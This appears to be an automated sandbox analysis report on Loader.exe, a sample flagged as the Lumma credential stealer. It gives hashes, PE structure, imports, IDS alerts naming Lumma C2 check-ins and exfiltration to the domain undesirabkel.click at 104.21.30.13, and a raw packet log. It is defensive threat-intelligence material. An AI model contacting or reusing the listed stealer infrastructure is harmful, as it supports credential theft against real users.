                                                                                          • Execution Graph export aborted for target Loader.exe, PID 7400 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: Loader.exe
                                                                                          TimeTypeDescription
                                                                                          17:26:58API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.30.13WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                            https://ffm.bio/wilmingtonfirmGet hashmaliciousUnknownBrowse
                                                                                              Linux_x86Get hashmaliciousUnknownBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                undesirabkel.clickWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUShttps://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.216.74
                                                                                                New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.92.91
                                                                                                WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.emlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.11.207
                                                                                                SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                • 104.21.73.97
                                                                                                NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                • 172.67.157.249
                                                                                                ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.66.86
                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.60.24
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                a0e9f5d64349fb13191bc781f81f42e1New Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                • 104.21.30.13
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                                                File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):14402
                                                                                                Entropy (8bit):4.874636730022465
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.567353425486414
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Loader.exe
                                                                                                File size:567'296 bytes
                                                                                                MD5:7773630abc9d30d9e4fb74481736224c
                                                                                                SHA1:960bcdda71ed3b4bef604dc549cdf4a0f84c4636
                                                                                                SHA256:3cac35e6047f481ebf1530b5e63e9ad9846963dea7238351770dd6f21b846711
                                                                                                SHA512:ee91f6aef70f96c39361c20bbe26b697367941977cfba4f1f1847db7e393a1906f41a5ca26c4af2bed7fc1935062c97f9dc89a8bd8047aad2217439c636cfa28
                                                                                                SSDEEP:12288:kiiy2LA/I0xusciua5z2NEpYBRupKm7BfHgq155ppbdGax1Ou75vunMGZa02qRPG:kiiy2LA/I0xusciua5CNEpYBRupKm7Be
                                                                                                TLSH:ECC4D0127281C0B3D96316765C78C7794A3EBC100F616AC797984BBEDEB06D19F30A6E
                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....[mg..........................................@.......................................@..................................j..<..
                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                Entrypoint:0x410590
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows cui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x676D5BDA [Thu Dec 26 13:36:26 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:35f2e35a9ab5b63b150853141ee62e01
                                                                                                Instruction
                                                                                                call 00007F929CE6E1FAh
                                                                                                jmp 00007F929CE6E05Dh
                                                                                                mov ecx, dword ptr [0043B680h]
                                                                                                push esi
                                                                                                push edi
                                                                                                mov edi, BB40E64Eh
                                                                                                mov esi, FFFF0000h
                                                                                                cmp ecx, edi
                                                                                                je 00007F929CE6E1F6h
                                                                                                test esi, ecx
                                                                                                jne 00007F929CE6E218h
                                                                                                call 00007F929CE6E221h
                                                                                                mov ecx, eax
                                                                                                cmp ecx, edi
                                                                                                jne 00007F929CE6E1F9h
                                                                                                mov ecx, BB40E64Fh
                                                                                                jmp 00007F929CE6E200h
                                                                                                test esi, ecx
                                                                                                jne 00007F929CE6E1FCh
                                                                                                or eax, 00004711h
                                                                                                shl eax, 10h
                                                                                                or ecx, eax
                                                                                                mov dword ptr [0043B680h], ecx
                                                                                                not ecx
                                                                                                pop edi
                                                                                                mov dword ptr [0043B6C0h], ecx
                                                                                                pop esi
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 14h
                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                xorps xmm0, xmm0
                                                                                                push eax
                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                call dword ptr [00436D0Ch]
                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                call dword ptr [00436CC4h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                call dword ptr [00436CC0h]
                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                push eax
                                                                                                call dword ptr [00436D5Ch]
                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                xor eax, ecx
                                                                                                leave
                                                                                                ret
                                                                                                mov eax, 00004000h
                                                                                                ret
                                                                                                push 0043CF48h
                                                                                                call dword ptr [00436D34h]
                                                                                                ret
                                                                                                push 00030000h
                                                                                                push 00010000h
                                                                                                push 00000000h
                                                                                                call 00007F929CE74FD3h
                                                                                                add esp, 0Ch
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x36a8c0x3c.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x8f0000x3fc.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2758.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x326180x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2eaa80xc0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x36c4c0x184.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x2b5ba0x2b6008e72f979a692e30591852f96987fd08fFalse0.5447136167146974data6.592696701047982IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x2d0000xc5640xc600d34fae497fb62cbb1bc8f3b2d6d79c25False0.4033696338383838data4.744194731846056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x3a0000x37140x2800f57039ea5e709bc930aadb529c6e1a9dFalse0.29794921875data5.024446305521937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .reloc0x3f0000x27580x280026cb1ac5cc2461d1d4d4b059e129fd1fFalse0.751953125data6.531626083298937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .bss0x420000x4d0000x4d000183f98511ebb2d7ebd985f00b0c819dbFalse1.0003360896915585data7.9994026084018195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x8f0000x3fc0x4006d588082959117d83b5b94b45915208aFalse0.4423828125data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_VERSION0x8f0580x3a4dataEnglishUnited States0.44849785407725323
                                                                                                DLLImport
                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                ADVAPI32.dllCryptDestroyKey, CryptEncrypt
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-12-27T23:26:57.370528+01002058550ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)1192.168.2.4647221.1.1.153UDP
                                                                                                2024-12-27T23:26:58.822905+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449730104.21.30.13443TCP
                                                                                                2024-12-27T23:26:58.822905+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.30.13443TCP
                                                                                                2024-12-27T23:26:59.564081+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.30.13443TCP
                                                                                                2024-12-27T23:26:59.564081+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.30.13443TCP
                                                                                                2024-12-27T23:27:00.794201+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449731104.21.30.13443TCP
                                                                                                2024-12-27T23:27:00.794201+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.30.13443TCP
                                                                                                2024-12-27T23:27:01.586988+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.30.13443TCP
                                                                                                2024-12-27T23:27:01.586988+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.30.13443TCP
                                                                                                2024-12-27T23:27:03.254522+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449732104.21.30.13443TCP
                                                                                                2024-12-27T23:27:03.254522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.30.13443TCP
                                                                                                2024-12-27T23:27:06.637591+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.30.13443TCP
                                                                                                2024-12-27T23:27:07.941464+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449733104.21.30.13443TCP
                                                                                                2024-12-27T23:27:07.941464+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.30.13443TCP
                                                                                                2024-12-27T23:27:10.195422+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449734104.21.30.13443TCP
                                                                                                2024-12-27T23:27:10.195422+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.30.13443TCP
                                                                                                2024-12-27T23:27:12.836751+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449735104.21.30.13443TCP
                                                                                                2024-12-27T23:27:12.836751+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.30.13443TCP
                                                                                                2024-12-27T23:27:15.839085+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449737104.21.30.13443TCP
                                                                                                2024-12-27T23:27:15.839085+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.30.13443TCP
                                                                                                2024-12-27T23:27:20.017873+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449741104.21.30.13443TCP
                                                                                                2024-12-27T23:27:20.017873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.30.13443TCP
                                                                                                2024-12-27T23:27:20.785675+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741104.21.30.13443TCP
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 27, 2024 23:26:57.597110987 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:57.597134113 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:57.597239971 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:57.600778103 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:57.600790024 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:58.822835922 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:58.822905064 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:58.833307981 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:58.833321095 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:58.833606958 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:58.883348942 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:58.892082930 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:58.892117977 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:58.892184973 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:59.564101934 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:59.564207077 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:59.564265013 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:59.569823980 CET49730443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:59.569834948 CET44349730104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:59.579668045 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:59.579725027 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:26:59.579813957 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:59.580122948 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:26:59.580138922 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:00.794121027 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:00.794200897 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:00.795536995 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:00.795547009 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:00.795753956 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:00.797404051 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:00.797437906 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:00.797466993 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.586996078 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587052107 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587101936 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.587124109 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587172985 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587205887 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587220907 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.587228060 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.587268114 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.587275028 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.603333950 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.603404999 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.603411913 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.611558914 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.611630917 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.611637115 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.664721012 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.706607103 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.758501053 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.758507967 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782675982 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782711983 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782742977 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.782749891 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782793999 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.782802105 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782812119 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.782869101 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.783133030 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.783140898 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:01.783153057 CET49731443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:01.783158064 CET44349731104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:02.036906004 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:02.036955118 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:02.037029028 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:02.037395000 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:02.037411928 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:03.254448891 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:03.254522085 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:03.255753040 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:03.255767107 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:03.255992889 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:03.257086039 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:03.257216930 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:03.257246971 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:03.257313013 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:03.257319927 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:06.637599945 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:06.637737989 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:06.637836933 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:06.638031960 CET49732443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:06.638045073 CET44349732104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:06.724975109 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:06.725004911 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:06.725083113 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:06.725406885 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:06.725419044 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:07.941350937 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:07.941463947 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:07.943099976 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:07.943109989 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:07.944092989 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:07.945746899 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:07.945877075 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:07.945911884 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:08.743118048 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:08.743235111 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:08.743280888 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:08.744271994 CET49733443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:08.744291067 CET44349733104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:08.935646057 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:08.935681105 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:08.935753107 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:08.936083078 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:08.936098099 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:10.195358038 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:10.195421934 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:10.197468996 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:10.197479963 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:10.197710037 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:10.198728085 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:10.198918104 CET49734443192.168.2.4104.21.30.13
                                                                                                Dec 27, 2024 23:27:10.198951960 CET44349734104.21.30.13192.168.2.4
                                                                                                Dec 27, 2024 23:27:10.199007034 CET49734443192.168.2.4104.21.30.13
